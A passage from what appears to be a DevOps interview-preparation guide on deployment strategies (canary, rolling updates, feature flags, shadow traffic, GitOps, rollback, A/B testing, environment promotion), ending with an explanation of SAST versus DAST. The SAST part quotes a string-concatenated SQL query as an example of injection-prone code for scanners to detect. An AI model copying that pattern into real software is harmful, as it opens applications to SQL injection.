- If any step shows regression, automatically roll back to 0% canary traffic.
- Kayenta (Netflix/Spinnaker): Statistical canary analysis. Compares canary metrics against baseline (old version) metrics using Mann-Whitney U test. Produces a score from 0-100. Score < 50 = fail = auto-rollback. Score > 70 = pass = promote.
- Argo Rollouts (Kubernetes): Defines canary steps in a `Rollout` resource. Integrates with Prometheus for automated analysis. Failed analysis triggers rollback.
- Flagger (Kubernetes): Similar to Argo Rollouts, works with Istio, Linkerd, or App Mesh for traffic shifting.
- Golden signals: Latency, error rate, traffic volume, saturation (CPU/memory).
- Business metrics: Conversion rate, cart abandonment rate, API call success rate. A canary might have perfect error rates but cause a 5% drop in conversions because a UX change confused users.
- Downstream impact: Does the canary version increase error rates in services it calls? A canary might look healthy while degrading a downstream database.
- “How do you handle canary for stateful operations (e.g., writes to a database)?” This is the hardest part. If canary version v2 writes data in a new format, and you rollback to v1, can v1 read v2’s data? The answer must be yes — forward and backward compatibility. Some teams use a “canary database” for writes (separate database or table partition) and merge the data after promotion. More commonly, the data format is kept backward-compatible so both versions can coexist. For critical writes (financial transactions), some teams make canary read-only and only enable writes after full promotion.
- “Your canary shows a 0.5% error rate increase. The baseline is 2%. Is that significant?” It depends on sample size and normal variance. With 1,000 requests to canary, a 0.5% increase means 5 additional errors — this could be statistical noise. With 100,000 requests, it’s 500 additional errors — significant. Use statistical significance testing (chi-squared test for proportions, or Kayenta’s built-in analysis). Also check: are the errors affecting all users or just a specific segment? Is the error rate stable at 2.5% or climbing? A stable 2.5% might be a known issue; a climbing rate signals a progressive failure.
- “How long should a canary bake before promotion?” Long enough to capture the full traffic pattern. If your app has daily traffic cycles (high during business hours, low at night), the canary should bake through at least one full cycle (24 hours) before full promotion. For traffic-pattern-insensitive services, 15-30 minutes at each step with statistical analysis is usually sufficient. For critical services, some teams bake for 72 hours at 5% before promoting to 50%. The more critical the service, the longer the bake.
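The sample-size argument in the "0.5% error rate increase" question above can be checked numerically. The sketch below uses a two-proportion z-test, which for a 2x2 comparison is equivalent to the chi-squared test without continuity correction. The baseline sample size of 100,000 requests is an assumption made for the example, and this is not how Kayenta computes its score.

```python
import math

def two_proportion_z_test(errors_a, total_a, errors_b, total_b):
    """Two-sided z-test for a difference between two error rates.

    Returns (z, p_value), using the pooled-proportion standard error.
    """
    rate_a = errors_a / total_a
    rate_b = errors_b / total_b
    pooled = (errors_a + errors_b) / (total_a + total_b)
    std_err = math.sqrt(pooled * (1 - pooled) * (1 / total_a + 1 / total_b))
    z = (rate_b - rate_a) / std_err
    p_value = math.erfc(abs(z) / math.sqrt(2))  # two-sided tail probability
    return z, p_value

# Baseline: 2% errors over an assumed 100,000 requests.
# Canary: 2.5% errors over 1,000 requests, then over 100,000 requests.
small = two_proportion_z_test(2_000, 100_000, 25, 1_000)
large = two_proportion_z_test(2_000, 100_000, 2_500, 100_000)

print(f"1,000 canary requests:   z={small[0]:.2f}, p={small[1]:.3f}")
print(f"100,000 canary requests: z={large[0]:.2f}, p={large[1]:.2e}")
```

With the small sample the p-value is well above the usual 0.05 cutoff, so the difference is indistinguishable from noise. With the large sample the same 0.5-point gap is overwhelmingly significant.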
23. Rolling Update
- `maxSurge: 25%`: allow 25% more pods than desired count during update (4 desired = up to 5 during rollout).
- `maxUnavailable: 25%`: allow 25% of pods to be unavailable during update (4 desired = at least 3 running).
- Kubernetes creates new pods (v2), waits for them to pass readiness probes, then terminates old pods (v1). This continues until all pods are v2.
- API changes must be backward-compatible during rollout. Add new fields, don’t remove or rename old ones until the rollout is complete and only v2 is running.
- Database migrations must work with both v1 and v2 code simultaneously.
- Frontend clients that cache the old JavaScript bundle might send requests to v2 backend with v1 assumptions. Use API versioning or graceful degradation.
- “How do you set maxSurge and maxUnavailable for a latency-sensitive service?” For a latency-sensitive service, you want zero capacity reduction during the rollout (every request must have a healthy pod to serve it). Set `maxUnavailable: 0` (never reduce capacity below desired count) and `maxSurge: 25-50%` (bring up new pods before terminating old ones). This uses more resources during the rollout but ensures no request capacity is lost. For non-critical batch services, you can use `maxUnavailable: 50%` to speed up the rollout.
- “Your rolling update is stuck and pods keep failing readiness probes. What do you do?” `kubectl rollout status` shows it’s stuck. `kubectl get pods` shows new pods in CrashLoopBackOff or not-ready state. Check pod logs (`kubectl logs`), describe the pod for events (`kubectl describe pod`), check readiness probe configuration (wrong port? wrong path? too aggressive timeout?). If it’s a code bug: `kubectl rollout undo deployment/myapp` to revert to the previous ReplicaSet. Check the deployment’s `progressDeadlineSeconds` (default: 600 seconds). Once the deadline passes without progress, Kubernetes marks the rollout as failed, but it does not roll back on its own.
- “How does Kubernetes ensure zero downtime during a rolling update?” Three mechanisms: readiness probes (new pods only receive traffic once they report ready), preStop hooks (old pods get a grace period to finish in-flight requests before termination), and SIGTERM handling (the app catches SIGTERM and stops accepting new connections while completing existing ones). If any of these three is missing, you’ll see brief error spikes during rollouts. The most commonly missed: a preStop hook with a small sleep to allow the load balancer to deregister the pod before it starts shutting down.
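The pod-count arithmetic behind `maxSurge` and `maxUnavailable` can be sketched as follows. Kubernetes rounds a percentage `maxSurge` up and a percentage `maxUnavailable` down; the function names here are hypothetical helpers for illustration, not part of any Kubernetes client.

```python
import math

def resolve(value, replicas, round_up):
    """Resolve an absolute count or a percentage string against the replica count."""
    if isinstance(value, str) and value.endswith("%"):
        raw = replicas * int(value[:-1]) / 100
        return math.ceil(raw) if round_up else math.floor(raw)
    return int(value)

def rollout_bounds(replicas, max_surge="25%", max_unavailable="25%"):
    """Return the pod-count envelope a rolling update must stay within."""
    surge = resolve(max_surge, replicas, round_up=True)                # rounds up
    unavailable = resolve(max_unavailable, replicas, round_up=False)   # rounds down
    return {
        "max_total_pods": replicas + surge,
        "min_available_pods": replicas - unavailable,
    }

default_bounds = rollout_bounds(4)                       # the 4-replica example above
latency_sensitive = rollout_bounds(10, "25%", 0)         # maxUnavailable: 0
print(default_bounds)
print(latency_sensitive)
```

For the latency-sensitive setting, the available count never drops below the desired 10 replicas, at the cost of temporarily running up to 13 pods.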
24. Feature Toggles (Flags)
`if (featureFlags.isEnabled('new-checkout'))` and control visibility independently of deployments.
Types of feature flags:
- Release flags: “Is this feature ready for users?” Boolean, temporary. Remove after the feature is fully launched. Lifespan: days to weeks.
- Experiment flags: “Which version performs better?” A/B testing. Route 50% to variant A, 50% to B. Measure conversion. Lifespan: weeks.
- Ops flags: “Is this system healthy?” Kill switches: `if (flags.isEnabled('enable-payment-processing'))`. Used to disable problematic features without deploying. Lifespan: permanent (but rarely toggled).
- Permission flags: “Does this user have access?” Per-user or per-segment targeting. “Enable feature X for beta users.” Lifespan: varies.
`on` and `off` states. Stale flags (feature launched 6 months ago, flag still in code) are tech debt. They confuse new developers (“Should I test with this on or off?”), increase cyclomatic complexity, and create dead code paths.
Mitigation: Set expiration dates on flags. Auto-create tickets to remove flags after launch. Track flag age in a dashboard. Some teams have a policy: if a release flag is older than 30 days and is on for 100% of users, it must be removed in the next sprint.
Red flag answer: “We use feature flags for everything and never remove them.” This is a recipe for unmaintainable code. Also: “Feature flags are just if statements.” This misses the targeting, metrics, and operational aspects.
Follow-up:
- “How do you test code behind feature flags?” Test both paths. Unit tests should run with flag on AND flag off. CI matrix: `FEATURE_NEW_CHECKOUT=true` and `FEATURE_NEW_CHECKOUT=false`. For complex flag combinations, use combinatorial testing (not every combination, but critical paths with each flag in each state). LaunchDarkly provides a “test” SDK that lets you set flag values deterministically in tests without calling the real service.
- “A feature flag is controlling a critical path. How do you manage the risk?” The flag evaluation itself is a point of failure. What happens if the flag service is unreachable? Always define a default value (`isEnabled('feature', default=false)`). Use local caching with a fallback: the SDK caches the last known flag state and serves it if the flag service is down. For critical ops flags (kill switches), consider storing them in a local config file that can be updated without the flag service, as a belt-and-suspenders approach.
- “How do you handle database schema changes behind a feature flag?” This is tricky because the database doesn’t have an `if` statement. Deploy the schema change (add new columns) without the flag, so the schema is always “expanded.” The flag controls which code path reads/writes the data. Old path: reads from old columns. New path: reads from new columns. When the flag is fully on and the old path is removed, you can contract the schema (remove old columns) in a subsequent migration. This is the expand-contract pattern applied to feature flags.
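The default-plus-cache behavior described for critical-path flags can be sketched in a few lines. This is an illustrative client, not the API of LaunchDarkly or any other vendor SDK; `FlagClient` and `FakeFlagService` are hypothetical names, and the fake service only stands in for a remote flag backend that may be unreachable.

```python
class FlagClient:
    """Evaluates flags, falling back to the last known value, then to a default."""

    def __init__(self, fetch):
        self._fetch = fetch   # callable(name) -> bool; may raise when the service is down
        self._cache = {}      # last known good value per flag

    def is_enabled(self, name, default=False):
        try:
            value = bool(self._fetch(name))
        except Exception:
            # Flag service unreachable or flag unknown: serve cached value, else default.
            return self._cache.get(name, default)
        self._cache[name] = value
        return value


class FakeFlagService:
    """Hypothetical stand-in for a remote flag service."""

    def __init__(self, values):
        self.values = values
        self.down = False

    def __call__(self, name):
        if self.down:
            raise ConnectionError("flag service unreachable")
        return self.values[name]


service = FakeFlagService({"new-checkout": True})
client = FlagClient(service)
first = client.is_enabled("new-checkout")                 # fetched live and cached
service.down = True
during_outage = client.is_enabled("new-checkout")         # served from cache
unknown = client.is_enabled("never-seen", default=False)  # no cache entry: default
```

Choosing the default deliberately matters: for a kill switch such as `enable-payment-processing`, the safe default depends on whether failing open or failing closed is less harmful.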
25. Shadow Deployment (Dark Launch)
- Production traffic hits the load balancer.
- The load balancer or a service mesh (Istio) duplicates each request.
- Original goes to v1 (production) and returns the response to the user.
- Copy goes to v2 (shadow) and the response is logged but discarded.
- Compare v1 and v2 responses asynchronously: latency differences, response body differences, error rate differences.
- Major rewrites: Replacing a payment service written in Ruby with one in Go. Shadow both, compare results for weeks before cutting over. Any discrepancy in responses = a bug to fix.
- ML model deployment: New recommendation model runs in shadow. Compare recommendations against the existing model. Measure click-through rate prediction accuracy before serving to users.
- Database migration: New database (Postgres to DynamoDB). Shadow reads go to both. Compare query results. Any difference = a migration bug.
- Side effects: If the shadow request writes to a database, sends an email, or charges a credit card, you’ve just doubled those actions. Shadow traffic must be filtered to remove or mock all write operations. This is the #1 mistake: someone shadows a `POST /orders` endpoint and creates duplicate orders.
- Load: Shadow traffic doubles the load on downstream services. If the shadow service calls a third-party API, you’re doubling your API calls (and possibly your bill). Use circuit breakers or sampling (shadow 10% instead of 100%).
- Async processing: If the shadow request triggers background jobs (send email, process webhook), you need to suppress those in the shadow path.
- “How do you handle shadow deployments for write operations?” Option 1: Shadow only read endpoints (`GET` requests). This covers many comparison scenarios. Option 2: For write operations, the shadow version writes to a separate database/namespace (a “shadow database”). Compare the resulting state periodically. Option 3: Mock all external side effects in the shadow path (intercept HTTP calls, queue writes to a dead-letter queue for analysis instead of executing them). The key principle: shadow traffic must never produce user-visible side effects.
- “How do you compare v1 and v2 responses at scale?” Log both responses with a correlation ID (request ID). A comparison pipeline (Kafka consumer, batch job) reads both responses and diffs them. Ignore expected differences (timestamps, UUIDs) and flag unexpected ones. At GitHub, when they rewrote their permissions system, they shadowed every permission check for months, comparing old and new results. Any discrepancy was a bug. Tools: Diffy (Twitter’s open-source response diffing proxy), custom Kafka consumers.
- “What’s the difference between shadow deployment and canary deployment?” Canary serves real responses to a small percentage of users — users are affected by bugs. Shadow never serves responses to users — it’s purely for validation. Canary is useful when you need to validate real user behavior (A/B metrics, conversion rates). Shadow is useful when you need to validate correctness without any user risk. A mature deployment strategy might use shadow first (validate correctness), then canary (validate user impact), then full rollout.
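The response comparison step (ignore expected differences, flag unexpected ones) can be sketched as a recursive diff over JSON-like data. This is a minimal illustration and not how Diffy works internally; the ignored field names and the sample responses are assumptions.

```python
IGNORED_FIELDS = {"timestamp", "request_id"}  # hypothetical fields expected to differ

def diff_responses(v1, v2, path=""):
    """Return the paths where two JSON-like responses differ, skipping ignored fields."""
    if isinstance(v1, dict) and isinstance(v2, dict):
        differences = []
        for key in sorted(set(v1) | set(v2)):
            if key in IGNORED_FIELDS:
                continue
            child = f"{path}.{key}" if path else key
            if key not in v1 or key not in v2:
                differences.append(child)  # field present on only one side
            else:
                differences.extend(diff_responses(v1[key], v2[key], child))
        return differences
    if isinstance(v1, list) and isinstance(v2, list) and len(v1) == len(v2):
        differences = []
        for index, (a, b) in enumerate(zip(v1, v2)):
            differences.extend(diff_responses(a, b, f"{path}[{index}]"))
        return differences
    return [] if v1 == v2 else [path or "<root>"]

# Hypothetical logged responses joined by correlation ID.
prod = {"total": 100, "items": [{"sku": "A", "qty": 1}], "timestamp": "10:00:00"}
shadow = {"total": 101, "items": [{"sku": "A", "qty": 1}], "timestamp": "10:00:01"}
mismatches = diff_responses(prod, shadow)
print(mismatches)
```

Only `total` is reported here; the differing `timestamp` is treated as expected noise.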
26. GitOps (ArgoCD)
- Declarative: The entire system state is described declaratively (Kubernetes manifests, Helm charts, Kustomize overlays).
- Versioned and immutable: All changes go through Git. Pull requests, code review, audit trail. No `kubectl apply` from a developer’s laptop.
- Pulled automatically: The cluster agent (ArgoCD, Flux) polls the Git repo and applies changes. This is pull-based (cluster pulls state from Git) vs push-based (CI pushes to cluster). Pull-based is more secure because the cluster doesn’t need to expose its API externally.
- Continuously reconciled: If someone manually changes a resource in the cluster (`kubectl edit`), the GitOps controller detects the drift and reverts it to match Git. This prevents configuration drift and enforces Git as the source of truth.
- Application CRD: Defines source (Git repo, path, branch), destination (cluster, namespace), and sync policy.
- Sync status: `Synced` (Git matches cluster), `OutOfSync` (Git and cluster differ), `Unknown` (can’t determine).
- Auto-sync vs manual sync: Auto-sync automatically applies changes when Git changes. Manual sync requires a human to click “Sync” in the UI or CLI. For production, many teams use auto-sync for non-critical services and manual sync for critical ones.
- Sync waves: Control the order of resource application. Wave 0 = namespaces, Wave 1 = secrets, Wave 2 = deployments. Ensures dependencies are created first.
- App of Apps pattern: A parent ArgoCD Application manages child Applications. One repo defines all applications in the cluster. Adding a new service = adding one YAML file to Git.
- “How do you handle secrets in GitOps if everything must be in Git?” Secrets can’t be stored in plain text in Git. Options: Sealed Secrets (encrypt secrets client-side, store encrypted YAML in Git, controller decrypts in cluster), External Secrets Operator (syncs secrets from Vault/AWS Secrets Manager into Kubernetes Secrets — Git references the external secret, not the value), SOPS (Mozilla’s Secrets OPerationS — encrypts specific values in YAML files using KMS keys). The pattern: Git stores a reference or encrypted version of the secret, never the plaintext.
- “What’s the difference between ArgoCD and Flux?” Both implement GitOps. ArgoCD has a rich UI, multi-tenancy support, RBAC, and the App of Apps pattern. Flux is more lightweight, Kubernetes-native (CRDs only, no UI by default), and integrates tightly with the Kubernetes ecosystem (Kustomize, Helm controllers as separate components). ArgoCD is better for organizations that need a dashboard and fine-grained access control. Flux is better for teams that prefer pure CLI/GitOps workflows. Both are CNCF graduated projects.
- “Someone runs `kubectl edit deployment` in production. What happens in a GitOps setup?” ArgoCD detects the drift within its polling interval (default: 3 minutes) and marks the Application as `OutOfSync`. If auto-sync is enabled, it reverts the change to match Git. If manual sync, it alerts the team that drift was detected. This is exactly the behavior you want: it enforces that all changes go through Git. To make the change stick, the engineer must commit it to Git, get it reviewed, and let ArgoCD apply it. Some teams disable `kubectl edit` access entirely via RBAC to prevent this scenario.
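The reconcile behavior in this section (detect drift, then either revert or report `OutOfSync`) can be illustrated with a toy loop over plain dictionaries. This is a conceptual sketch only: ArgoCD’s real diffing and sync logic is far more involved, and the function names and manifests below are hypothetical.

```python
import copy

def find_drift(desired, live, path=""):
    """Return paths where the live object differs from the desired (Git) state.

    Fields that exist only in the live object (such as status) are ignored.
    """
    drift = []
    for key, want in desired.items():
        child = f"{path}.{key}" if path else key
        have = live.get(key)
        if isinstance(want, dict) and isinstance(have, dict):
            drift.extend(find_drift(want, have, child))
        elif want != have:
            drift.append(child)
    return drift

def overlay(target, source):
    """Write every desired field onto the target, leaving other fields untouched."""
    for key, value in source.items():
        if isinstance(value, dict) and isinstance(target.get(key), dict):
            overlay(target[key], value)
        else:
            target[key] = copy.deepcopy(value)

def reconcile(desired, live, auto_sync):
    """Return (sync_status, resulting_live_state) for one reconcile pass."""
    if not find_drift(desired, live):
        return "Synced", live
    if not auto_sync:
        return "OutOfSync", live          # report drift, wait for a manual sync
    healed = copy.deepcopy(live)
    overlay(healed, desired)              # revert the manual change
    return "Synced", healed

# Hypothetical state: Git says 3 replicas, someone edited the cluster to 5.
git_state = {"spec": {"replicas": 3, "image": "myapp:abc1234"}}
cluster_state = {"spec": {"replicas": 5, "image": "myapp:abc1234"}, "status": {"ready": 5}}
manual_result = reconcile(git_state, cluster_state, auto_sync=False)
auto_result = reconcile(git_state, cluster_state, auto_sync=True)
```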
27. Recreate Strategy
- Backward-incompatible schema migrations: The new database schema can’t coexist with old code. Running both versions simultaneously (as in rolling update) would cause errors. You must stop all old code, run the migration, then start new code.
- Singleton applications: Only one instance should run at a time (e.g., a Kubernetes operator, a job scheduler, a leader-election-based service). Running two instances causes conflicts (duplicate cron jobs, double-processed events).
- Shared volume access: The application uses a ReadWriteOnce persistent volume. Only one pod can mount it at a time. Rolling update would fail because the new pod can’t mount the volume while the old pod still has it.
- License constraints: Some commercial software licenses limit concurrent instances.
- Stateful applications with incompatible state: A cache or in-memory store that can’t be shared across versions.
- “How do you minimize downtime with recreate strategy?” Pre-pull images on all nodes before the deploy (DaemonSet that pulls the image). Reduce graceful termination period (`terminationGracePeriodSeconds`) to the minimum safe value. Use init containers for heavy startup tasks (database connection warming) so the main container starts faster. Configure aggressive readiness probes (check every 1 second instead of 10). For the ultimate optimization: pre-warm a complete new set of pods, then atomically swap (which is basically blue-green).
- “How do you communicate planned downtime to users?” Maintenance page served by a static server or CDN (not by the app being restarted). Schedule during the lowest-traffic window (analytics will show this, often 2-4 AM local time). Notify users via email/status page 24 hours in advance. Use a status page (Statuspage.io, Instatus) that updates automatically when the deploy starts and completes. For API consumers, return `503 Service Unavailable` with a `Retry-After` header.
- “If you need to do a backward-incompatible migration, can you avoid downtime?” Yes, with more engineering effort. Use the expand-and-contract pattern across multiple deploys. Deploy 1: add new columns/tables (expand). Deploy 2: backfill data, write to both old and new. Deploy 3: switch reads to new, still write to both. Deploy 4: remove old columns/tables (contract). Each deploy is independently backward-compatible. Total effort: 4 deploys over days vs. 1 deploy with 5 minutes of downtime. The choice depends on your SLA requirements and traffic patterns.
28. Rollback Strategy
- Kubernetes: `kubectl rollout undo deployment/myapp` reverts to the previous ReplicaSet. Takes seconds. Works because Kubernetes retains previous ReplicaSet configs.
- Docker/Containers: Deploy the previous image tag. Since artifacts are immutable and tagged with git SHA, `myapp:abc1234` is always the same binary.
- ArgoCD: Revert the Git commit. ArgoCD detects the change and deploys the previous version. Or use ArgoCD’s “rollback” feature to sync to a previous Git revision.
`SELECT *`, probably not; if using explicit column lists, probably yes). But if the migration dropped a column or changed a data type, the old code is broken.
Strategies:
- Forward-only migrations: Never rollback the database. If the new code is bad, fix forward (deploy a new version with the fix). This requires fast pipeline speed (< 15 minutes from commit to production).
- Paired rollback migrations: Every migration has a corresponding “down” migration. Tools like Flyway and Liquibase support this. Danger: down migrations can lose data (you can’t un-drop a column if the data is gone).
- Backward-compatible migrations only: Design every migration so both old and new code work. Never remove or rename columns in the same release that changes code expectations. This is the gold standard but requires discipline.
- Error rate exceeds 2x baseline for 2 minutes.
- p99 latency exceeds 3x baseline for 5 minutes.
- Health check failures on > 50% of new pods.
- Kubernetes: `progressDeadlineSeconds` in the Deployment spec (flags a stalled rollout as failed; Kubernetes does not roll back on its own).
- Argo Rollouts: `AnalysisRun` with Prometheus queries.
`kubectl rollout undo`.” No mention of database state, data consistency, or automated triggers. Rollback is a system problem, not just a Kubernetes command.
Follow-up:
- “A rollback succeeded but users are still seeing errors. Why?” Possible causes: CDN/browser cache is serving old frontend assets that call new (now rolled-back) API endpoints. DNS TTL hasn’t expired (still routing to the new version in some regions). Database was migrated and old code can’t work with the new schema. Downstream services cached data from the new version. Kafka consumers processed messages from the new version and the resulting state is incompatible. Rollback doesn’t undo side effects.
- “How do you handle rollback when multiple services deploy together?” Avoid coupled deployments. Each service should be independently deployable and rollbackable. If Service A v2 depends on Service B v2, you have a coordination problem. Solutions: deploy Service B v2 first (backward-compatible API), verify it, then deploy Service A v2. If A needs rollback, B’s v2 API still works for A’s v1 (backward-compatible). If this isn’t possible, use a feature flag: deploy both, enable the feature flag to activate the new interaction, disable the flag to “rollback” without redeploying.
- “What’s your opinion on ‘always fix forward’ vs ‘always rollback’?” Both have merits. Fix forward works when: your pipeline is fast (< 15 min), the issue is well-understood, and you have the engineering capacity to fix quickly. Rollback works when: the issue is unclear, the blast radius is large, or the fix will take hours. My default: rollback first (stop the bleeding), investigate, then fix forward. Time to recovery (MTTR) is the metric that matters, and rollback usually gets you there fastest. The teams that struggle most are those that have neither — they can’t rollback (no artifact versioning) and can’t fix forward (slow pipeline).
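The automated rollback triggers listed in this section (error rate above 2x baseline for 2 minutes, p99 latency above 3x baseline for 5 minutes) can be sketched as a sustained-breach check over metric samples. The function names, the sampling interval, and the sample data are assumptions for illustration; a real setup would read these values from a metrics system such as Prometheus.

```python
def breached_for(samples, threshold, window_seconds):
    """True if every sample in the trailing window exceeds the threshold.

    samples: list of (timestamp_seconds, value) tuples, oldest first.
    """
    if not samples:
        return False
    latest = samples[-1][0]
    if latest - samples[0][0] < window_seconds:
        return False  # not enough history to cover the whole window
    window = [value for ts, value in samples if ts >= latest - window_seconds]
    return all(value > threshold for value in window)

def should_rollback(error_rates, p99_latencies, baseline_error, baseline_p99):
    """Apply the two sustained-breach triggers described in the text."""
    return (
        breached_for(error_rates, 2 * baseline_error, 120)
        or breached_for(p99_latencies, 3 * baseline_p99, 300)
    )

# Hypothetical samples every 30 seconds over 5 minutes.
timestamps = range(0, 301, 30)
healthy_latency = [(t, 200.0) for t in timestamps]
sustained_errors = [(t, 0.05 if t >= 180 else 0.01) for t in timestamps]
single_blip = [(t, 0.05 if t == 300 else 0.01) for t in timestamps]

rollback_on_sustained = should_rollback(sustained_errors, healthy_latency, 0.02, 150.0)
rollback_on_blip = should_rollback(single_blip, healthy_latency, 0.02, 150.0)
```

Requiring the breach to hold for the whole window is what keeps a single noisy sample from triggering a rollback.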
29. A/B Testing
- Assignment: A hashing function assigns users to groups deterministically. `hash(user_id + experiment_name) % 100`: values 0-49 get variant A, 50-99 get variant B. This ensures a user always sees the same variant (no flickering) and assignment is balanced.
- Exposure: The application checks the user’s group and renders the appropriate variant. Feature flags (LaunchDarkly, Optimizely, GrowthBook) handle this.
- Measurement: Track the target metric (conversion rate, click-through rate, revenue per user) for each group over a sufficient duration.
- Analysis: Use statistical tests (chi-squared for proportions, t-test for continuous metrics) to determine if the difference is statistically significant (p < 0.05) and practically significant (the effect size is large enough to matter).
- Sample size: You need enough users in each group for the result to be statistically meaningful. Detecting a 1 percentage point difference in conversion rate takes on the order of 16,000 users per group (at 80% power and p < 0.05; the exact number depends on the baseline rate). Running an A/B test on 100 users proves nothing.
- Duration: Run for at least 1-2 full business cycles (2 weeks minimum) to account for day-of-week effects. Stopping an experiment early because “it looks like a winner” is a statistical error called “peeking.”
- Multiple comparisons: Testing 10 variants simultaneously means a roughly 40% chance of at least one false positive at p < 0.05 (1 − 0.95^10 ≈ 0.40, assuming independent tests). Use Bonferroni correction or sequential testing.
- Network effects: If variant A users interact with variant B users (social features, marketplace), contamination biases the results. Use cluster randomization (randomize by region or social graph cluster).
- “How does A/B testing differ from canary deployment?” Canary is a deployment safety mechanism — “does the new code work correctly?” Metric: error rate, latency. A/B testing is a product experiment — “does the new feature perform better?” Metric: conversion, revenue, engagement. A canary runs for hours. An A/B test runs for weeks. A canary rolls out to 100% when validated. An A/B test might result in choosing the old version. They can coexist: canary validates code safety, then A/B validates product impact.
- “The A/B test shows variant B has 3% higher conversion. The PM wants to ship it. What questions do you ask?” Is the result statistically significant (p < 0.05)? What’s the confidence interval (if it’s 3% +/- 4%, the true effect could be negative)? Was the test run for a full business cycle? Are there segment differences (B might be better overall but worse for mobile users)? Is there a novelty effect (users engage more because it’s new, not because it’s better — needs a holdout group after launch)? What’s the impact on secondary metrics (conversion up but customer support tickets also up)?
- “How do you handle A/B testing for server-side changes (like a different algorithm)?” Same principle, different implementation. Instead of rendering different UI, the API returns different results based on the experiment group. The group assignment happens server-side based on the user ID. Log the experiment assignment alongside the event tracking so the analytics pipeline can attribute outcomes to the right variant. For ML models, this is standard: “model A” vs “model B” serving different recommendations, with A/B metrics tracked through the recommendation click-through pipeline.
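Deterministic assignment of the form `hash(user_id + experiment_name) % 100` can be sketched as below. SHA-256 is used here as an assumption; Python’s built-in `hash()` is salted per process for strings, so it would not give stable buckets across restarts. The `:` separator and the experiment names are also illustrative choices.

```python
import hashlib

def assign_variant(user_id, experiment_name):
    """Map a user to variant A or B; the same inputs always give the same variant."""
    key = f"{user_id}:{experiment_name}".encode("utf-8")
    digest = hashlib.sha256(key).digest()
    bucket = int.from_bytes(digest[:8], "big") % 100   # bucket in 0..99
    return "A" if bucket < 50 else "B"

# Hypothetical experiment: check stability and rough balance over 10,000 users.
assignments = [assign_variant(user_id, "new-checkout") for user_id in range(10_000)]
share_a = assignments.count("A") / len(assignments)
print(f"share of users in variant A: {share_a:.3f}")
```

Including the experiment name in the hashed key means a user’s bucket in one experiment is independent of their bucket in another, which avoids the same users always landing in the treatment group.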
30. Environment Promotion
- The Docker image `myapp:a1b2c3d` is built once in CI. That exact image (same SHA256 digest) is deployed to dev, then staging, then production.
- Configuration that differs between environments (database URL, API keys, feature flags, log levels) is injected at runtime via environment variables, ConfigMaps, or a config service.
- Never rebuild for production. If you rebuild, you risk: different dependency versions resolved (a new transitive dependency version got published between your CI build and your “prod build”), different build flags, different build environment state. “But it worked in staging” almost always traces back to a different artifact.
- Tag-based: After staging tests pass, tag the image `staging-approved`. After prod smoke tests, tag `prod-release-2024-01-15`. Promotion = adding a tag.
- Registry-based: Copy the image from a staging registry to a production registry. This provides network isolation (production pulls from a production-only registry).
- GitOps-based: Update the image tag in the environment-specific Kustomize overlay or Helm values file. A PR to the `prod/` directory triggers production deployment after review.
- Kubernetes ConfigMaps and Secrets mounted as environment variables or files.
- AWS Parameter Store / Secrets Manager with application-level SDK.
- Spring Cloud Config, Consul KV for application configuration.
- 12-Factor App methodology: all config is in the environment, never in code.
- “How do you verify that the image in production is the same one that was tested in staging?” Compare Docker image digests (`sha256:abc...`). Tags are mutable (you can re-tag a different image as `v1.2.3`), but digests are immutable (derived from the image content). In your CD pipeline, record the digest after build, verify the digest matches at each promotion step. Container signing (Cosign, Notary) adds cryptographic verification: the CI pipeline signs the image, and the production cluster only admits images with a valid signature from your CI signer.
- “What about configuration drift between environments, where staging config doesn’t match production?” This is a real problem. Staging might have different instance counts, different feature flags, or different third-party API endpoints that behave differently. Mitigation: automate environment configuration through code (Terraform, Helm values files). Diff environment configs in Git and review the differences. For critical services, run a periodic config comparison that alerts on drift. Some teams maintain a “production parity” score that measures how similar staging is to production across dimensions like instance types, replica counts, and configuration values.
- “How do you handle environment-specific secrets in promotion?” Secrets are never in the artifact. Each environment has its own secret store (Vault path, AWS Secrets Manager secret). The application reads secrets at startup using an environment-specific identifier. In Kubernetes: `ExternalSecret` resources reference different AWS secrets per namespace (`dev/db-password` vs `prod/db-password`). The artifact has no knowledge of the secret values. It only knows the key name (`DATABASE_PASSWORD`) and reads it from the environment.
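The difference between mutable tags and content-derived digests, and the digest check at each promotion step, can be illustrated with a toy in-memory registry. This is a simplification: real registries compute the digest over the image manifest, and `Registry`, `digest_of`, and `verify_promotion` are hypothetical names rather than any registry client API.

```python
import hashlib

def digest_of(image_bytes):
    """Content-derived identifier: the same bytes always give the same digest."""
    return "sha256:" + hashlib.sha256(image_bytes).hexdigest()

class Registry:
    """Toy registry where a tag is just a mutable pointer to a digest."""

    def __init__(self):
        self.tags = {}

    def push(self, tag, image_bytes):
        self.tags[tag] = digest_of(image_bytes)
        return self.tags[tag]

def verify_promotion(recorded_digest, registry, tag):
    """Fail the promotion step if the tag no longer points at the tested image."""
    actual = registry.tags.get(tag)
    if actual != recorded_digest:
        raise ValueError(f"{tag} resolves to {actual}, expected {recorded_digest}")
    return actual

registry = Registry()
tested_digest = registry.push("myapp:a1b2c3d", b"image built once in CI")
verified = verify_promotion(tested_digest, registry, "myapp:a1b2c3d")

# Someone re-pushes different content under the same tag.
registry.push("myapp:a1b2c3d", b"rebuilt image with different dependencies")
try:
    verify_promotion(tested_digest, registry, "myapp:a1b2c3d")
    tampering_detected = False
except ValueError:
    tampering_detected = True
```

Deploying by digest rather than by tag removes the need for this check at deploy time, since the reference itself pins the content.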
4. Security (DevSecOps)
31. SAST vs DAST
- SAST (Static Application Security Testing): Analyzes source code, bytecode, or binaries without executing the application. It reads the code and looks for vulnerability patterns.
  - How it works: Parses source code into an Abstract Syntax Tree (AST), applies rules to detect patterns. Example: `"SELECT * FROM users WHERE id = " + userInput` matches a SQL injection rule. Advanced tools use taint analysis: tracking untrusted input (e.g., HTTP request parameters) through code paths to see if it reaches a sensitive sink (database query, file system operation, eval) without sanitization.
  - Tools: SonarQube, Semgrep, CodeQL (GitHub), Checkmarx, Fortify, Bandit (Python), gosec (Go).
  - Strengths: Finds vulnerabilities early (in the IDE or CI), pinpoints the exact line of vulnerable code, works on incomplete/undeployable code.
  - Weaknesses: High false positive rate (flags code that looks vulnerable but is actually safe due to context). Can’t detect runtime issues (misconfigurations, authentication bypass through middleware, business logic flaws). Doesn’t understand the deployed architecture.
- DAST (Dynamic Application Security Testing): Tests the running application from the outside, like an attacker would. It sends malicious inputs and observes the responses.
  - How it works: Crawls the application to discover endpoints. Sends attack payloads (SQL injection strings, XSS payloads, path traversal sequences). Analyzes responses for evidence of successful exploitation.
  - Tools: OWASP ZAP (open-source), Burp Suite, Nuclei, StackHawk.
